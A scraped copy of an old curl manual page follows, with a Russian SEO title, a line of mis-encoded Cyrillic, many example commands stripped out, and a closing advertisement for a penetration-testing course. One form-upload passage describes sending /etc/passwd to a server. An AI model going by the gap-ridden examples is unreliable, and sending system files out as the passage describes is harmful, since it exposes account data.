Curl команды. HTTP аутентификация cURL в командной строке. Проверка возможности подключения к URL-адресу

curl (1)

>> curl (1) (тБЪОЩЕ man: лПНБОДЩ Й РТЙЛМБДОЩЕ РТПЗТБННЩ РПМШЪПЧБФЕМШУЛПЗП ХТПЧОС)

лМАЮ curl ПВОБТХЦЕО Ч ВБЪЕ ЛМАЮЕЧЩИ УМПЧ.

NAME

curl - transfer a URL

SYNOPSIS

curl

DESCRIPTION

curl is a tool to transfer data from or to a server, using one of the supported protocols (HTTP, HTTPS, FTP, FTPS, TFTP, DICT, TELNET, LDAP or FILE). The command is designed to work without user interaction.

curl offers a busload of useful tricks like proxy support, user authentication, ftp upload, HTTP post, SSL (https:) connections, cookies, file transfer resume and more. As you will see below, the amount of features will make your head spin!

curl is powered by libcurl for all transfer-related features. See (3) for details.

URL

The URL syntax is protocol dependent. You"ll find a detailed description in RFC 3986.

You can specify multiple URLs or parts of URLs by writing part sets within braces as in:

or you can get sequences of alphanumeric series by using as in:

No nesting of the sequences is supported at the moment, but you can use several ones next to each other:

You can specify any amount of URLs on the command line. They will be fetched in a sequential manner in the specified order.

Since curl 7.15.1 you can also specify step counter for the ranges, so that you can get every Nth number or letter:

If you specify URL without protocol:// prefix, curl will attempt to guess what protocol you might want. It will then default to HTTP but try other protocols based on often-used host name prefixes. For example, for host names starting with "ftp." curl will assume you want to speak FTP.

PROGRESS METER

curl normally displays a progress meter during operations, indicating amount of transfered data, transfer speeds and estimated time left etc.

However, since curl displays data to the terminal by default, if you invoke curl to do an operation and it is about to write data to the terminal, it disables the progress meter as otherwise it would mess up the output mixing progress meter and response data.

If you want a progress meter for HTTP POST or PUT requests, you need to redirect the response output to a file, using shell redirect (>), -o or similar.

It is not the same case for FTP upload as that operation is not spitting out any response data to the terminal.

If you prefer a progress "bar" instead of the regular meter, -# is your friend.

OPTIONS

-a/--append (FTP) When used in an FTP upload, this will tell curl to append to the target file instead of overwriting it. If the file doesn"t exist, it will be created.

If this option is used twice, the second one will disable append mode again. -A/--user-agent (HTTP) Specify the User-Agent string to send to the HTTP server. Some badly done CGIs fail if its not set to "Mozilla/4.0". To encode blanks in the string, surround the string with single quote marks. This can also be set with the -H/--header option of course.

If this option is set more than once, the last one will be the one that"s used. --anyauth (HTTP) Tells curl to figure out authentication method by itself, and use the most secure one the remote site claims it supports. This is done by first doing a request and checking the response-headers, thus inducing an extra network round-trip. This is used instead of setting a specific authentication method, which you can do with --basic , --digest , --ntlm , and --negotiate .

Note that using --anyauth is not recommended if you do uploads from stdin, since it may require data to be sent twice and then the client must be able to rewind. If the need should arise when uploading from stdin, the upload operation will fail.

If this option is used several times, the following occurrences make no difference. -b/--cookie (HTTP) Pass the data to the HTTP server as a cookie. It is supposedly the data previously received from the server in a "Set-Cookie:" line. The data should be in the format "NAME1=VALUE1; NAME2=VALUE2".

If no "=" letter is used in the line, it is treated as a filename to use to read previously stored cookie lines from, which should be used in this session if they match. Using this method also activates the "cookie parser" which will make curl record incoming cookies too, which may be handy if you"re using this in combination with the -L/--location option. The file format of the file to read cookies from should be plain HTTP headers or the Netscape/Mozilla cookie file format.

NOTE that the file specified with -b/--cookie is only used as input. No cookies will be stored in the file. To store cookies, use the -c/--cookie-jar option or you could even save the HTTP headers to a file using -D/--dump-header !

If this option is set more than once, the last one will be the one that"s used. -B/--use-ascii Enable ASCII transfer when using FTP or LDAP. For FTP, this can also be enforced by using an URL that ends with ";type=A". This option causes data sent to stdout to be in text mode for win32 systems.

If this option is used twice, the second one will disable ASCII usage. --basic (HTTP) Tells curl to use HTTP Basic authentication. This is the default and this option is usually pointless, unless you use it to override a previously set option that sets a different authentication method (such as --ntlm , --digest and --negotiate ).

If this option is used several times, the following occurrences make no difference. --ciphers (SSL) Specifies which ciphers to use in the connection. The list of ciphers must be using valid ciphers. Read up on SSL cipher list details on this URL: http://www.openssl.org/docs/apps/ciphers.html

If this option is used several times, the last one will override the others. --compressed (HTTP) Request a compressed response using one of the algorithms libcurl supports, and return the uncompressed document. If this option is used and the server sends an unsupported encoding, Curl will report an error.

If this option is used several times, each occurrence will toggle it on/off. --connect-timeout Maximum time in seconds that you allow the connection to the server to take. This only limits the connection phase, once curl has connected this option is of no more use. See also the -m/--max-time option.

If this option is used several times, the last one will be used. -c/--cookie-jar Specify to which file you want curl to write all cookies after a completed operation. Curl writes all cookies previously read from a specified file as well as all cookies received from remote server(s). If no cookies are known, no file will be written. The file will be written using the Netscape cookie file format. If you set the file name to a single dash, "-", the cookies will be written to stdout.

NOTE If the cookie jar can"t be created or written to, the whole curl operation won"t fail or even report an error clearly. Using -v will get a warning displayed, but that is the only visible feedback you get about this possibly lethal situation.

If this option is used several times, the last specified file name will be used. -C/--continue-at Continue/Resume a previous file transfer at the given offset. The given offset is the exact number of bytes that will be skipped counted from the beginning of the source file before it is transferred to the destination. If used with uploads, the ftp server command SIZE will not be used by curl.

Use "-C -" to tell curl to automatically find out where/how to resume the transfer. It then uses the given output/input files to figure that out.

If this option is used several times, the last one will be used. --create-dirs When used in conjunction with the -o option, curl will create the necessary local directory hierarchy as needed. This option creates the dirs mentioned with the -o option, nothing else. If the -o file name uses no dir or if the dirs it mentions already exist, no dir will be created.

To create remote directories when using FTP, try --ftp-create-dirs . --crlf (FTP) Convert LF to CRLF in upload. Useful for MVS (OS/390).

If this option is used several times, the following occurrences make no difference. -d/--data (HTTP) Sends the specified data in a POST request to the HTTP server, in a way that can emulate as if a user has filled in a HTML form and pressed the submit button. Note that the data is sent exactly as specified with no extra processing (with all newlines cut off). The data is expected to be "url-encoded". This will cause curl to pass the data to the server using the content-type application/x-www-form-urlencoded. Compare to -F/--form . If this option is used more than once on the same command line, the data pieces specified will be merged together with a separating &-letter. Thus, using "-d name=daniel -d skill=lousy" would generate a post chunk that looks like "name=daniel&skill=lousy".

If you start the data with the letter @, the rest should be a file name to read the data from, or - if you want curl to read the data from stdin. The contents of the file must already be url-encoded. Multiple files can also be specified. Posting data from a file named "foobar" would thus be done with --data @foobar".

To post data purely binary, you should instead use the --data-binary option.

-d/--data is the same as --data-ascii .

If this option is used several times, the ones following the first will append data. --data-ascii (HTTP) This is an alias for the -d/--data option.

If this option is used several times, the ones following the first will append data. --data-binary (HTTP) This posts data in a similar manner as --data-ascii does, although when using this option the entire context of the posted data is kept as-is. If you want to post a binary file without the strip-newlines feature of the --data-ascii option, this is for you.

If this option is used several times, the ones following the first will append data. --digest (HTTP) Enables HTTP Digest authentication. This is a authentication that prevents the password from being sent over the wire in clear text. Use this in combination with the normal -u/--user option to set user name and password. See also --ntlm , --negotiate and --anyauth for related options.

If this option is used several times, the following occurrences make no difference. --disable-eprt (FTP) Tell curl to disable the use of the EPRT and LPRT commands when doing active FTP transfers. Curl will normally always first attempt to use EPRT, then LPRT before using PORT, but with this option, it will use PORT right away. EPRT and LPRT are extensions to the original FTP protocol, may not work on all servers but enable more functionality in a better way than the traditional PORT command.

If this option is used several times, each occurrence will toggle this on/off. --disable-epsv (FTP) Tell curl to disable the use of the EPSV command when doing passive FTP transfers. Curl will normally always first attempt to use EPSV before PASV, but with this option, it will not try using EPSV.

If this option is used several times, each occurrence will toggle this on/off. -D/--dump-header Write the protocol headers to the specified file.

This option is handy to use when you want to store the headers that a HTTP site sends to you. Cookies from the headers could then be read in a second curl invoke by using the -b/--cookie option! The -c/--cookie-jar option is however a better way to store cookies.

When used on FTP, the ftp server response lines are considered being "headers" and thus are saved there.

If this option is used several times, the last one will be used. -e/--referer (HTTP) Sends the "Referer Page" information to the HTTP server. This can also be set with the -H/--header flag of course. When used with -L/--location you can append ";auto" to the --referer URL to make curl automatically set the previous URL when it follows a Location: header. The ";auto" string can be used alone, even if you don"t set an initial --referer.

If this option is used several times, the last one will be used. --engine Select the OpenSSL crypto engine to use for cipher operations. Use --engine list to print a list of build-time supported engines. Note that not all (or none) of the engines may be available at run-time. --environment (RISC OS ONLY) Sets a range of environment variables, using the names the -w option supports, to easier allow extraction of useful information after having run curl.

If this option is used several times, each occurrence will toggle this on/off. --egd-file (HTTPS) Specify the path name to the Entropy Gathering Daemon socket. The socket is used to seed the random engine for SSL connections. See also the --random-file option. -E/--cert (HTTPS) Tells curl to use the specified certificate file when getting a file with HTTPS. The certificate must be in PEM format. If the optional password isn"t specified, it will be queried for on the terminal. Note that this certificate is the private key and the private certificate concatenated!

If this option is used several times, the last one will be used. --cert-type (SSL) Tells curl what certificate type the provided certificate is in. PEM, DER and ENG are recognized types.

If this option is used several times, the last one will be used. --cacert (HTTPS) Tells curl to use the specified certificate file to verify the peer. The file may contain multiple CA certificates. The certificate(s) must be in PEM format.

curl recognizes the environment variable named "CURL_CA_BUNDLE" if that is set, and uses the given path as a path to a CA cert bundle. This option overrides that variable.

The windows version of curl will automatically look for a CA certs file named "curl-ca-bundle.crt", either in the same directory as curl.exe, or in the Current Working Directory, or in any folder along your PATH.

If this option is used several times, the last one will be used. --capath (HTTPS) Tells curl to use the specified certificate directory to verify the peer. The certificates must be in PEM format, and the directory must have been processed using the c_rehash utility supplied with openssl. Using --capath can allow curl to make https connections much more efficiently than using --cacert if the --cacert file contains many CA certificates.

If this option is used several times, the last one will be used. -f/--fail (HTTP) Fail silently (no output at all) on server errors. This is mostly done like this to better enable scripts etc to better deal with failed attempts. In normal cases when a HTTP server fails to deliver a document, it returns an HTML document stating so (which often also describes why and more). This flag will prevent curl from outputting that and return error 22.

If this option is used twice, the second will again disable silent failure. --ftp-account (FTP) When an FTP server asks for "account data" after user name and password has been provided, this data is sent off using the ACCT command. (Added in 7.13.0)

If this option is used twice, the second will override the previous use. --ftp-create-dirs (FTP) When an FTP URL/operation uses a path that doesn"t currently exist on the server, the standard behavior of curl is to fail. Using this option, curl will instead attempt to create missing directories.

If this option is used twice, the second will again disable directory creation. --ftp-method (FTP) Control what method curl should use to reach a file on a FTP(S) server. The method argument should be one of the following alternatives: multicwd curl does a single CWD operation for each path part in the given URL. For deep hierarchies this means very many commands. This is how RFC1738 says it should be done. This is the default but the slowest behavior. nocwd curl does no CWD at all. curl will do SIZE, RETR, STOR etc and give a full path to the server for all these commands. This is the fastest behavior. singlecwd curl does one CWD with the full target directory and then operates on the file "normally" (like in the multicwd case). This is somewhat more standards compliant than "nocwd" but without the full penalty of "multicwd". --ftp-pasv (FTP) Use PASV when transferring. PASV is the internal default behavior, but using this option can be used to override a previous --ftp-port option. (Added in 7.11.0)

If this option is used several times, the following occurrences make no difference.

Ftp-alternative-to-user (FTP) If authenticating with the USER and PASS commands fails, send this command. When connecting to Tumbleweed"s Secure Transport server over FTPS using a client certificate, using "SITE AUTH" will tell the server to retrieve the username from the certificate. (Added in 7.15.5) --ftp-skip-pasv-ip (FTP) Tell curl to not use the IP address the server suggests in its response to curl"s PASV command when curl connects the data connection. Instead curl will re-use the same IP address it already uses for the control connection. (Added in 7.14.2)

This option has no effect if PORT, EPRT or EPSV is used instead of PASV.

If this option is used twice, the second will again use the server"s suggested address. --ftp-ssl (FTP) Try to use SSL/TLS for the FTP connection. Reverts to a non-secure connection if the server doesn"t support SSL/TLS. (Added in 7.11.0)

If this option is used twice, the second will again disable this. --ftp-ssl-reqd (FTP) Require SSL/TLS for the FTP connection. Terminates the connection if the server doesn"t support SSL/TLS. (Added in 7.15.5)

If this option is used twice, the second will again disable this. -F/--form (HTTP) This lets curl emulate a filled in form in which a user has pressed the submit button. This causes curl to POST data using the Content-Type multipart/form-data according to RFC1867. This enables uploading of binary files etc. To force the "content" part to be a file, prefix the file name with an @ sign. To just get the content part from a file, prefix the file name with the letter <. The difference between @ and < is then that @ makes a file get attached in the post as a file upload, while the < makes a text field and just get the contents for that text field from a file.

Example, to send your password file to the server, where "password" is the name of the form-field to which /etc/passwd will be the input:

To read the file"s content from stdin instead of a file, use - where the file name should"ve been. This goes for both @ and < constructs.

You can also tell curl what Content-Type to use by using "type=", in a manner similar to:

curl -F "[email protected];type=text/html" url.com

curl -F "name=daniel;type=text/foo" url.com

You can also explicitly change the name field of an file upload part by setting filename=, like this:

curl -F "file=@localfile;filename=nameinpost" url.com

See further examples and details in the MANUAL.

This option can be used multiple times. --form-string (HTTP) Similar to --form except that the value string for the named parameter is used literally. Leading "@" and "<" characters, and the ";type=" string in the value have no special meaning. Use this in preference to --form if there"s any possibility that the string value may accidentally trigger the "@" or "<" features of --form . -g/--globoff This option switches off the "URL globbing parser". When you set this option, you can specify URLs that contain the letters {} without having them being interpreted by curl itself. Note that these letters are not normal legal URL contents but they should be encoded according to the URI standard. -G/--get When used, this option will make all data specified with -d/--data or --data-binary to be used in a HTTP GET request instead of the POST request that otherwise would be used. The data will be appended to the URL with a "?" separator.

If used in combination with -I, the POST data will instead be appended to the URL with a HEAD request.

If this option is used several times, the following occurrences make no difference. -h/--help Usage help. -H/--header

(HTTP) Extra header to use when getting a web page. You may specify any number of extra headers. Note that if you should add a custom header that has the same name as one of the internal ones curl would use, your externally set header will be used instead of the internal one. This allows you to make even trickier stuff than curl would normally do. You should not replace internally set headers without knowing perfectly well what you"re doing. Replacing an internal header with one without content on the right side of the colon will prevent that header from appearing.

curl will make sure that each header you add/replace get sent with the proper end of line marker, you should thus not add that as a part of the header content: do not add newlines or carriage returns they will only mess things up for you.

See also the -A/--user-agent and -e/--referer options.

This option can be used multiple times to add/replace/remove multiple headers. --ignore-content-length (HTTP) Ignore the Content-Length header. This is particularly useful for servers running Apache 1.x, which will report incorrect Content-Length for files larger than 2 gigabytes. -i/--include (HTTP) Include the HTTP-header in the output. The HTTP-header includes things like server-name, date of the document, HTTP-version and more...

If this option is used twice, the second will again disable header include. --interface Perform an operation using a specified interface. You can enter interface name, IP address or host name. An example could look like:

If this option is used several times, the last one will be used. -I/--head (HTTP/FTP/FILE) Fetch the HTTP-header only! HTTP-servers feature the command HEAD which this uses to get nothing but the header of a document. When used on a FTP or FILE file, curl displays the file size and last modification time only.

If this option is used twice, the second will again disable header only. -j/--junk-session-cookies (HTTP) When curl is told to read cookies from a given file, this option will make it discard all "session cookies". This will basically have the same effect as if a new session is started. Typical browsers always discard session cookies when they"re closed down.

If this option is used several times, each occurrence will toggle this on/off. -k/--insecure (SSL) This option explicitly allows curl to perform "insecure" SSL connections and transfers. All SSL connections are attempted to be made secure by using the CA certificate bundle installed by default. This makes all connections considered "insecure" to fail unless -k/--insecure is used.

If this option is used twice, the second time will again disable it. --key (SSL) Private key file name. Allows you to provide your private key in this separate file.

If this option is used several times, the last one will be used. --key-type (SSL) Private key file type. Specify which type your --key provided private key is. DER, PEM and ENG are supported.

If this option is used several times, the last one will be used. --krb4 (FTP) Enable kerberos4 authentication and use. The level must be entered and should be one of "clear", "safe", "confidential" or "private". Should you use a level that is not one of these, "private" will instead be used.

This option requires that the library was built with kerberos4 support. This is not very common. Use -V/--version to see if your curl supports it.

If this option is used several times, the last one will be used. -K/--config Specify which config file to read curl arguments from. The config file is a text file in which command line arguments can be written which then will be used as if they were written on the actual command line. Options and their parameters must be specified on the same config file line. If the parameter is to contain white spaces, the parameter must be enclosed within quotes. If the first column of a config line is a "#" character, the rest of the line will be treated as a comment.

Specify the filename as "-" to make curl read the file from stdin.

Note that to be able to specify a URL in the config file, you need to specify it using the --url option, and not by simply writing the URL on its own line. So, it could look similar to this:

This option can be used multiple times.

When curl is invoked, it always (unless -q is used) checks for a default config file and uses it if found. The default config file is checked for in the following places in this order:

1) curl tries to find the "home dir": It first checks for the CURL_HOME and then the HOME environment variables. Failing that, it uses getpwuid() on unix-like systems (which returns the home dir given the current user in your system). On Windows, it then checks for the APPDATA variable, or as a last resort the "%USERPROFILE%Application Data".

2) On windows, if there is no _curlrc file in the home dir, it checks for one in the same dir the executable curl is placed. On unix-like systems, it will simply try to load .curlrc from the determined home dir. --limit-rate Specify the maximum transfer rate you want curl to use. This feature is useful if you have a limited pipe and you"d like your transfer not use your entire bandwidth.

The given speed is measured in bytes/second, unless a suffix is appended. Appending "k" or "K" will count the number as kilobytes, "m" or M" makes it megabytes while "g" or "G" makes it gigabytes. Examples: 200K, 3m and 1G.

If you are also using the -Y/--speed-limit option, that option will take precedence and might cripple the rate-limiting slightly, to help keeping the speed-limit logic working.

If this option is used several times, the last one will be used. -l/--list-only (FTP) When listing an FTP directory, this switch forces a name-only view. Especially useful if you want to machine-parse the contents of an FTP directory since the normal directory view doesn"t use a standard look or format.

This option causes an FTP NLST command to be sent. Some FTP servers list only files in their response to NLST; they do not include subdirectories and symbolic links.

If this option is used twice, the second will again disable list only. --local-port [-num] Set a prefered number or range of local port numbers to use for the connection(s). Note that port numbers by nature is a scarce resource that will be busy at times so setting this range to something too narrow might cause unnecessary connection setup failures. (Added in 7.15.2) -L/--location (HTTP/HTTPS) If the server reports that the requested page has moved to a different location (indicated with a Location: header and a 3XX response code) this option will make curl redo the request on the new place. If used together with -i/--include or -I/--head , headers from all requested pages will be shown. When authentication is used, curl only sends its credentials to the initial host. If a redirect takes curl to a different host, it won"t be able to intercept the user+password. See also --location-trusted on how to change this. You can limit the amount of redirects to follow by using the --max-redirs option.

If this option is used twice, the second will again disable location following. --location-trusted (HTTP/HTTPS) Like -L/--location , but will allow sending the name + password to all hosts that the site may redirect to. This may or may not introduce a security breach if the site redirects you do a site to which you"ll send your authentication info (which is plaintext in the case of HTTP Basic authentication).

If this option is used twice, the second will again disable location following. --max-filesize Specify the maximum size (in bytes) of a file to download. If the file requested is larger than this value, the transfer will not start and curl will return with exit code 63.

NOTE: The file size is not always known prior to download, and for such files this option has no effect even if the file transfer ends up being larger than this given limit. This concerns both FTP and HTTP transfers. -m/--max-time Maximum time in seconds that you allow the whole operation to take. This is useful for preventing your batch jobs from hanging for hours due to slow networks or links going down. See also the --connect-timeout option.

If this option is used several times, the last one will be used. -M/--manual Manual. Display the huge help text. -n/--netrc Makes curl scan the .netrc file in the user"s home directory for login name and password. This is typically used for ftp on unix. If used with http, curl will enable user authentication. See (4) or (1) for details on the file format. Curl will not complain if that file hasn"t the right permissions (it should not be world nor group readable). The environment variable "HOME" is used to find the home directory.

A quick and very simple example of how to setup a .netrc to allow curl to ftp to the machine host.domain.com with user name "myself" and password "secret" should look similar to:

machine host.domain.com login myself password secret

If this option is used twice, the second will again disable netrc usage. --netrc-optional Very similar to --netrc , but this option makes the .netrc usage optional and not mandatory as the --netrc does. --negotiate (HTTP) Enables GSS-Negotiate authentication. The GSS-Negotiate method was designed by Microsoft and is used in their web applications. It is primarily meant as a support for Kerberos5 authentication but may be also used along with another authentication methods. For more information see IETF draft draft-brezak-spnego-http-04.txt.

This option requires that the library was built with GSSAPI support. This is not very common. Use -V/--version to see if your version supports GSS-Negotiate.

When using this option, you must also provide a fake -u/--user option to activate the authentication code properly. Sending a "-u:" is enough as the user name and password from the -u option aren"t actually used.

If this option is used several times, the following occurrences make no difference. -N/--no-buffer Disables the buffering of the output stream. In normal work situations, curl will use a standard buffered output stream that will have the effect that it will output the data in chunks, not necessarily exactly when the data arrives. Using this option will disable that buffering.

If this option is used twice, the second will again switch on buffering. --ntlm (HTTP) Enables NTLM authentication. The NTLM authentication method was designed by Microsoft and is used by IIS web servers. It is a proprietary protocol, reversed engineered by clever people and implemented in curl based on their efforts. This kind of behavior should not be endorsed, you should encourage everyone who uses NTLM to switch to a public and documented authentication method instead. Such as Digest.

If you want to enable NTLM for your proxy authentication, then use --proxy-ntlm .

This option requires that the library was built with SSL support. Use -V/--version to see if your curl supports NTLM.

If this option is used several times, the following occurrences make no difference. -o/--output Write output to instead of stdout. If you are using {} or to fetch multiple documents, you can use "#" followed by a number in the specifier. That variable will be replaced with the current string for the URL being fetched. Like in:

You may use this option as many times as you have number of URLs.

See also the --create-dirs option to create the local directories dynamically. -O/--remote-name Write output to a local file named like the remote file we get. (Only the file part of the remote file is used, the path is cut off.)

The remote file name to use for saving is extracted from the given URL, nothing else.

You may use this option as many times as you have number of URLs. --pass (SSL) Pass phrase for the private key

If this option is used several times, the last one will be used. --proxy-anyauth Tells curl to pick a suitable authentication method when communicating with the given proxy. This will cause an extra request/response round-trip. (Added in 7.13.2)

If this option is used twice, the second will again disable the proxy use-any authentication. --proxy-basic Tells curl to use HTTP Basic authentication when communicating with the given proxy. Use --basic for enabling HTTP Basic with a remote host. Basic is the default authentication method curl uses with proxies.

If this option is used twice, the second will again disable proxy HTTP Basic authentication. --proxy-digest Tells curl to use HTTP Digest authentication when communicating with the given proxy. Use --digest for enabling HTTP Digest with a remote host.

If this option is used twice, the second will again disable proxy HTTP Digest. --proxy-ntlm Tells curl to use HTTP NTLM authentication when communicating with the given proxy. Use --ntlm for enabling NTLM with a remote host.

If this option is used twice, the second will again disable proxy HTTP NTLM. -p/--proxytunnel When an HTTP proxy is used (-x/--proxy ), this option will cause non-HTTP protocols to attempt to tunnel through the proxy instead of merely using it to do HTTP-like operations. The tunnel approach is made with the HTTP proxy CONNECT request and requires that the proxy allows direct connect to the remote port number curl wants to tunnel through to.

If this option is used twice, the second will again disable proxy tunnel. -P/--ftp-port

(FTP) Reverses the initiator/listener roles when connecting with ftp. This switch makes Curl use the PORT command instead of PASV. In practice, PORT tells the server to connect to the client"s specified address and port, while PASV asks the server for an ip address and port to connect to.

should be one of: interface i.e "eth0" to specify which interface"s IP address you want to use (Unix only) IP address i.e "192.168.10.1" to specify exact IP number host name i.e "my.host.domain" to specify machine - make curl pick the same IP address that is already used for the control connection

If this option is used several times, the last one will be used. Disable the use of PORT with --ftp-pasv . Disable the attempt to use the EPRT command instead of PORT by using --disable-eprt . EPRT is really PORT++. -q If used as the first parameter on the command line, the curlrc config file will not be read and used. See the -K/--config for details on the default config file search path. -Q/--quote (FTP) Send an arbitrary command to the remote FTP server. Quote commands are sent BEFORE the transfer is taking place (just after the initial PWD command to be exact). To make commands take place after a successful transfer, prefix them with a dash "-". To make commands get sent after libcurl has changed working directory, just before the transfer command(s), prefix the command with "+". You may specify any amount of commands. If the server returns failure for one of the commands, the entire operation will be aborted. You must send syntactically correct FTP commands as RFC959 defines.

This option can be used multiple times. --random-file (HTTPS) Specify the path name to file containing what will be considered as random data. The data is used to seed the random engine for SSL connections. See also the --egd-file option. -r/--range (HTTP/FTP) Retrieve a byte range (i.e a partial document) from a HTTP/1.1 or FTP server. Ranges can be specified in a number of ways. 0-499 specifies the first 500 bytes 500-999 specifies the second 500 bytes -500 specifies the last 500 bytes 9500- specifies the bytes from offset 9500 and forward 0-0,-1 specifies the first and last byte only(*)(H) 500-700,600-799 specifies 300 bytes from offset 500(H) 100-199,500-599 specifies two separate 100 bytes ranges(*)(H)

(*) = NOTE that this will cause the server to reply with a multipart response!

You should also be aware that many HTTP/1.1 servers do not have this feature enabled, so that when you attempt to get a range, you"ll instead get the whole document.

FTP range downloads only support the simple syntax "start-stop" (optionally with one of the numbers omitted). It depends on the non-RFC command SIZE.

If this option is used several times, the last one will be used. -R/--remote-time When used, this will make libcurl attempt to figure out the timestamp of the remote file, and if that is available make the local file get that same timestamp.

If this option is used twice, the second time disables this again. --retry If a transient error is returned when curl tries to perform a transfer, it will retry this number of times before giving up. Setting the number to 0 makes curl do no retries (which is the default). Transient error means either: a timeout, an FTP 5xx response code or an HTTP 5xx response code.

When curl is about to retry a transfer, it will first wait one second and then for all forthcoming retries it will double the waiting time until it reaches 10 minutes which then will be the delay between the rest of the retries. By using --retry-delay you disable this exponential backoff algorithm. See also --retry-max-time to limit the total time allowed for retries. (Added in 7.12.3)

If this option is used multiple times, the last occurrence decide the amount. --retry-delay Make curl sleep this amount of time between each retry when a transfer has failed with a transient error (it changes the default backoff time algorithm between retries). This option is only interesting if --retry is also used. Setting this delay to zero will make curl use the default backoff time. (Added in 7.12.3)

If this option is used multiple times, the last occurrence decide the amount. --retry-max-time The retry timer is reset before the first transfer attempt. Retries will be done as usual (see --retry ) as long as the timer hasn"t reached this given limit. Notice that if the timer hasn"t reached the limit, the request will be made and while performing, it may take longer than this given time period. To limit a single request"s maximum time, use -m/--max-time . Set this option to zero to not timeout retries. (Added in 7.12.3)

If this option is used multiple times, the last occurrence decide the amount. -s/--silent Silent mode. Don"t show progress meter or error messages. Makes Curl mute.

If this option is used twice, the second will again disable silent mode. -S/--show-error When used with -s it makes curl show error message if it fails.

If this option is used twice, the second will again disable show error. --socks4 Use the specified SOCKS4 proxy. If the port number is not specified, it is assumed at port 1080. (Added in 7.15.2)

-x/--proxy

If this option is used several times, the last one will be used. --socks5 Use the specified SOCKS5 proxy. If the port number is not specified, it is assumed at port 1080. (Added in 7.11.1)

This option overrides any previous use of -x/--proxy , as they are mutually exclusive.

If this option is used several times, the last one will be used. (This option was previously wrongly documented and used as --socks without the number appended.) --stderr Redirect all writes to stderr to the specified file instead. If the file name is a plain "-", it is instead written to stdout. This option has no point when you"re using a shell with decent redirecting capabilities.

If this option is used several times, the last one will be used. --tcp-nodelay Turn on the TCP_NODELAY option. See the (3) man page for details about this option. (Added in 7.11.2)

If this option is used several times, each occurrence toggles this on/off. -t/--telnet-option Pass options to the telnet protocol. Supported options are:

TTYPE= Sets the terminal type.

XDISPLOC= Sets the X display location.

NEW_ENV= Sets an environment variable. -T/--upload-file This transfers the specified local file to the remote URL. If there is no file part in the specified URL, Curl will append the local file name. NOTE that you must use a trailing / on the last directory to really prove to Curl that there is no file name or curl will think that your last directory name is the remote file name to use. That will most likely cause the upload operation to fail. If this is used on a http(s) server, the PUT command will be used.

Use the file name "-" (a single dash) to use stdin instead of a given file.

You can specify one -T for each URL on the command line. Each -T + URL pair specifies what to upload and to where. curl also supports "globbing" of the -T argument, meaning that you can upload multiple files to a single URL by using the same URL globbing style supported in the URL, like this:

FILES

~/.curlrc Default config file, see -K/--config for details.

ENVIRONMENT

http_proxy [:port] Sets proxy server to use for HTTP. HTTPS_PROXY [:port] Sets proxy server to use for HTTPS. FTP_PROXY [:port] Sets proxy server to use for FTP. ALL_PROXY [:port] Sets proxy server to use if no protocol-specific proxy is set. NO_PROXY list of host names that shouldn"t go through any proxy. If set to a asterisk "*" only, it matches all hosts.

EXIT CODES

There exists a bunch of different error codes and their corresponding error messages that may appear during bad conditions. At the time of this writing, the exit codes are: 1 Unsupported protocol. This build of curl has no support for this protocol. 2 Failed to initialize. 3 URL malformat. The syntax was not correct. 4 URL user malformatted. The user-part of the URL syntax was not correct. 5 Couldn"t resolve proxy. The given proxy host could not be resolved. 6 Couldn"t resolve host. The given remote host was not resolved. 7 Failed to connect to host. 8 FTP weird server reply. The server sent data curl couldn"t parse. 9 FTP access denied. The server denied login or denied access to the particular resource or directory you wanted to reach. Most often you tried to change to a directory that doesn"t exist on the server. 10 FTP user/password incorrect. Either one or both were not accepted by the server. 11 FTP weird PASS reply. Curl couldn"t parse the reply sent to the PASS request. 12 FTP weird USER reply. Curl couldn"t parse the reply sent to the USER request. 13 FTP weird PASV reply, Curl couldn"t parse the reply sent to the PASV request. 14 FTP weird 227 format. Curl couldn"t parse the 227-line the server sent. 15 FTP can"t get host. Couldn"t resolve the host IP we got in the 227-line. 16 FTP can"t reconnect. Couldn"t connect to the host we got in the 227-line. 17 FTP couldn"t set binary. Couldn"t change transfer method to binary. 18 Partial file. Only a part of the file was transferred. 19 FTP couldn"t download/access the given file, the RETR (or similar) command failed. 20 FTP write error. The transfer was reported bad by the server. 21 FTP quote error. A quote command returned error from the server. 22 HTTP page not retrieved. The requested url was not found or returned another error with the HTTP error code being 400 or above. This return code only appears if -f/--fail is used. 23 Write error. Curl couldn"t write data to a local filesystem or similar. 24 Malformed user. User name badly specified. 25 FTP couldn"t STOR file. The server denied the STOR operation, used for FTP uploading. 26 Read error. Various reading problems. 27 Out of memory. A memory allocation request failed. 28 Operation timeout. The specified time-out period was reached according to the conditions. 29 FTP couldn"t set ASCII. The server returned an unknown reply. 30 FTP PORT failed. The PORT command failed. Not all FTP servers support the PORT command, try doing a transfer using PASV instead! 31 FTP couldn"t use REST. The REST command failed. This command is used for resumed FTP transfers. 32 FTP couldn"t use SIZE. The SIZE command failed. The command is an extension to the original FTP spec RFC 959. 33 HTTP range error. The range "command" didn"t work. 34 HTTP post error. Internal post-request generation error. 35 SSL connect error. The SSL handshaking failed. 36 FTP bad download resume. Couldn"t continue an earlier aborted download. 37 FILE couldn"t read file. Failed to open the file. Permissions? 38 LDAP cannot bind. LDAP bind operation failed. 39 LDAP search failed. 40 Library not found. The LDAP library was not found. 41 Function not found. A required LDAP function was not found. 42 Aborted by callback. An application told curl to abort the operation. 43 Internal error. A function was called with a bad parameter. 44 Internal error. A function was called in a bad order. 45 Interface error. A specified outgoing interface could not be used. 46 Bad password entered. An error was signaled when the password was entered. 47 Too many redirects. When following redirects, curl hit the maximum amount. 48 Unknown TELNET option specified. 49 Malformed telnet option. 51 The remote peer"s SSL certificate wasn"t ok 52 The server didn"t reply anything, which here is considered an error. 53 SSL crypto engine not found 54 Cannot set SSL crypto engine as default 55 Failed sending network data 56 Failure in receiving network data 57 Share is in use (internal error) 58 Problem with the local certificate 59 Couldn"t use specified SSL cipher 60 Problem with the CA cert (path? permission?) 61 Unrecognized transfer encoding 62 Invalid LDAP URL 63 Maximum file size exceeded 64 Requested FTP SSL level failed 65 Sending the data requires a rewind that failed 66 Failed to initialise SSL Engine 67 User, password or similar was not accepted and curl failed to login 68 File not found on TFTP server 69 Permission problem on TFTP server 70 Out of disk space on TFTP server 71 Illegal TFTP operation 72 Unknown TFTP transfer ID 73 File already exists (TFTP) 74 No such user (TFTP) 75 Character conversion failed 76 Character conversion functions required XX There will appear more error codes here in future releases. The existing ones are meant to never change.

Представляем вашему вниманию новый курс от команды The Codeby - "Тестирование Веб-Приложений на проникновение с нуля". Общая теория, подготовка рабочего окружения, пассивный фаззинг и фингерпринт, Активный фаззинг, Уязвимости, Пост-эксплуатация, Инструментальные средства, Social Engeneering и многое другое.

Источник:

